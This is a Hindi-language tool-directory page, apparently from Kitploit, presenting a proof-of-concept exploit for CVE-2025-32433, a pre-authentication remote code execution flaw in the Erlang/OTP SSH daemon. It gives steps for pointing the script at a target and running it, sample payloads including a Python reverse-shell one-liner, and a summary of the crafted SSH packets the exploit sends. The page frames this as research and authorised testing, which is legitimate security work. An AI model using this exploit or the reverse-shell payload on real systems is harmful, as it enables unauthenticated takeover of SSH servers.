Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/mdusmandasthaheer/cve-2025-32433
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubmdusmandasthaheer/cve-2025-32433

CVE-2025-32433

CVE-2025-32433 के लिए प्रमाण-अवधारणा शोषण, जो Erlang/OTP SSH डेमॉन में प्रमाणीकरण-पूर्व RCE है। इसमें Python स्क्रिप्ट शामिल है जो तैयार किए गए SSH चैनल अनुरोध भेजती है और मनमाना कमांड निष्पादित करती है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-32433 – Erlang/OTP SSH RCE भेद्यता

📌 सारांश

CVE-2025-32433 एक रिमोट कोड निष्पादन (RCE) भेद्यता है जो Erlang/OTP SSH डेमॉन को प्रभावित करती है। इसका मूल कारण पूर्व-प्रमाणीकरण SSH चैनल अनुरोधों का अनुचित संचालन है, जिसे हमलावर द्वारा प्रमाणीकरण से पहले मनमाने कमांड निष्पादन के लिए तैयार किया जा सकता है। शामिल PoC ऐसे तैयार किए गए SSH पैकेट भेजने का प्रदर्शन करता है; डिफ़ॉल्ट रूप से यह लक्ष्य पर /lab.txt लिखता है लेकिन इसे अन्य कमांड के लिए अनुकूलित किया जा सकता है।

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ उपयोग न करें।

🛠️ उपयोग

  1. PoC स्क्रिप्ट में लक्ष्य विवरण संपादित करें:
root@kitploit:~
HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
  1. एक्सप्लॉइट चलाएँ:
root@kitploit:~
python3 cve-2025-32433.py

डिफ़ॉल्ट रूप से यह /lab.txt बनाता है जिसमें होता है। अपने स्वयं के कमांड चलाने के लिए में पेलोड को संशोधित करें।

pwned
build_channel_request

🧩 उदाहरण पेलोड

root@kitploit:~
# Write a file
file:write_file("/lab.txt", <<"pwned">>).

Spawn a reverse shell

os:cmd("python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("127.0.0.1",2222)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); import pty; pty.spawn("sh")'")

🔧 PoC कैसे काम करता है (संक्षिप्त)

  • SSH सेवा से जुड़ता है और बैनर का आदान-प्रदान करता है।
  • एक सामान्य हैंडशेक जैसा दिखने के लिए एक तैयार SSH_MSG_KEXINIT भेजता है।
  • प्रमाणीकरण से पहले exec पेलोड के साथ SSH_MSG_CHANNEL_OPEN और SSH_MSG_CHANNEL_REQUEST भेजता है।
  • यदि कमजोर है, तो सर्वर प्रदान किए गए Erlang कमांड को निष्पादित करता है।

🙏 श्रेय

खोज और लेखन मैट कीली (प्लेटफ़ॉर्म सिक्योरिटी) द्वारा। PoC प्रकाशित करने और विवरण साझा करने के लिए उनका धन्यवाद।

ब्लॉग लिंक: https://platformsecurity.com/blog/CVE-2025-32433-poc

📚 संदर्भ

  • मैट कीली का ब्लॉग
  • Erlang/OTP सुरक्षा सलाहकार
  • MITRE CVE रिकॉर्ड
टूल डाउनलोड करें